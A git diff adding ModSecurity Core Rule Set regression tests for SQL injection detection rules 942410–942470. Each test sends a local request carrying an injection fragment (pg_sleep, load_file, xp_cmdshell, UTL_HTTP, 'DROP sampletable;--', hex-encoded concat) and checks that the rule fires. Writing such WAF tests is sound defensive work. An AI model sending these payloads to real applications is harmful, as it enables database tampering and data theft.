dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=hEx%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-37 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=if+%21%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-38 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=if+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-39 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=if%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-40 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=if%5C%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-41 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=IFNULL%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-42 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=in+%27%24%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-43 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=IN+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-44 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=IN%2F%2A%2A%2F%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-45 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=insert%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-46 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=left%27%29%3F%24%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-47 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=LEFT%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-48 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=length%7C%7C%21%21%24%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-49 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=length%7C%7C%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-50 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=length%3F%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-51 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=length%26%26%21%21%21%24%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-52 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=length%26%26%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-53 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=LENGTH%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-54 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=ln+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-55 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=ln%29+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-56 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=load_file%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-57 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=local%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-58 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=log%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-59 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=log%26%26%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-60 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=lower%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-61 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=MAKE_SET%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-62 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=MAX%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-63 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=md5%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-64 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=md5%5C%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-65 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=MID%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-66 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=minute+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-67 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=month%3D%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-68 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "name_const(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-69 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "now(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-70 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "nOW(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-71 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "ord(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-72 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "password?(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-73 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "password/?(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-74 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "Password>$(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-75 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pg_sleep(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-76 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pi(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-77 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "PI(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-78 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pow(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-79 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "POW(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-80 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "quarter. (" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-81 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "rand(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-82 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "Rand (" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-83 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "RAND(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-84 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "replace(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-85 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "REPLACE(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-86 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "round (" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-87 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "round(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-88 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "rtrim(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-89 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "RTRIM(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-90 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=sin (" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-91 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "SIN(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-92 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=sleep(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-93 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "SLEEP (" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-94 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=strcmp(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-95 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=substr(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-96 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "SUBSTR(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-97 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=substring(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-98 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "SUBSTRING(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-99 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=sysdate(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-100 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "time (" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-101 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=time%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-102 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=trim%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-103 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=Uncompress+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-104 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=unhex%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-105 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=uNhEx%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-106 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=updatexml%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-107 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=UpdateXML%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-108 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=UPPER%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-109 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=user+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-110 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=user%2F%3F%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-111 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=user%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-112 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=values+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-113 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=VALUES%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-114 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=version%3D%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-115 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=version%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-116 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=xmltype%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-117 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=XMLType%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-118 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=year%5D%3D%28" + version: HTTP/1.0 + output: + log_contains: id "942410" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml new file mode 100644 index 000000000..983c35592 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml @@ -0,0 +1,22 @@ +--- +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942420.yaml +tests: + - test_title: 942420-1 + desc: "Restricted SQL Character Anomaly Detection (cookies): # of special characters exceeded (8)" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Cookie: "ar=%7e%7e%7e%7e%7e%7e%7e%7e%7e&foo=var" + method: POST + port: 80 + uri: "/" + version: HTTP/1.0 + output: + log_contains: id "942420" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml new file mode 100644 index 000000000..1cc28a1c3 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml @@ -0,0 +1,22 @@ +--- +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942421.yaml +tests: + - test_title: 942421-1 + desc: "Restricted SQL Character Anomaly Detection (cookies): # of special characters exceeded (3)" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Cookie: "cookie=@@@@@@@@@@@@@" + method: GET + port: 80 + uri: "/" + version: HTTP/1.0 + output: + log_contains: id "942421" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml new file mode 100644 index 000000000..4fe810856 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml @@ -0,0 +1,21 @@ +--- +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942430.yaml +tests: + - test_title: 942430-1 + desc: "Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + data: "var=(((((())))))&var2=whatever" + version: HTTP/1.0 + output: + log_contains: id "942430" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml new file mode 100644 index 000000000..08b9577f4 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml @@ -0,0 +1,21 @@ +--- +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942431.yaml +tests: + - test_title: 942431-1 + desc: "Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + data: "var=-------------------&var2=whatever" + version: HTTP/1.0 + output: + log_contains: id "942431" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml new file mode 100644 index 000000000..39c906e2b --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml @@ -0,0 +1,21 @@ +--- +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942432.yaml +tests: + - test_title: 942432-1 + desc: "Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + data: "var=;;dd foo bar" + version: HTTP/1.0 + output: + log_contains: id "942432" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml new file mode 100644 index 000000000..e91050a11 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml @@ -0,0 +1,21 @@ +--- +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942440.yaml +tests: + - test_title: 942440-1 + desc: "SQL Comment Sequence" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: GET + port: 80 + uri: "/?var=DROP%20sampletable%3b--" + version: HTTP/1.0 + output: + log_contains: id "942440" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml new file mode 100644 index 000000000..7bd207301 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml @@ -0,0 +1,82 @@ +--- +meta: + author: "William Woodson" + description: None + enabled: true + name: 942450.yaml +tests: + - test_title: 942450-1 + desc: "SQL Hex Encoding" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + method: POST + uri: "/" + data: "var=%5c0xf00dsdfdsa" + version: HTTP/1.0 + output: + log_contains: id "942450" + - test_title: 942450-2 + desc: "SQL Hex Encoding" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + method: POST + uri: "/" + data: "var=concat%280x223e3c62723e%2Cversion%28%29%2C0x3c696d67207372633d22%29" + version: HTTP/1.0 + output: + log_contains: id "942450" + - test_title: 942450-3 + desc: "SQL Hex Encoding" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + method: POST + uri: "/" + data: "var=select%200x616263" + version: HTTP/1.0 + output: + log_contains: id "942450" + - test_title: 942450-4 + desc: "SQL Hex Encoding - negative" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + method: POST + uri: "/" + data: "var=IHRlc3Q0xAcF" + version: HTTP/1.0 + output: + no_log_contains: id "942450" + - test_title: 942450-5 + desc: "SQL Hex Encoding - negative" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + method: POST + uri: "/" + data: "var=9F86D081884C7D659A2FEAA0C55AD015A3BF4F1B2B0B822CD15D6C15B0F00A08" + version: HTTP/1.0 + output: + no_log_contains: id "942450" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml new file mode 100644 index 000000000..857a7a3cb --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml @@ -0,0 +1,157 @@ +--- +meta: + author: "Christoph Hansen" + description: None + enabled: true + name: 942470.yaml +tests: + - test_title: 942470-1 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=nvarchar" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_title: 942470-2 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=xp_cmdshell" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_title: 942470-3 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=varchar" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_title: 942470-4 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=xp_dirtree" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_title: 942470-5 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=xp_regread" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_title: 942470-6 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=sp_password" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_title: 942470-7 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=UTL_HTTP" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_title: 942470-8 + desc: "SQL Injection Attack" + stages: + - stage: + input: + 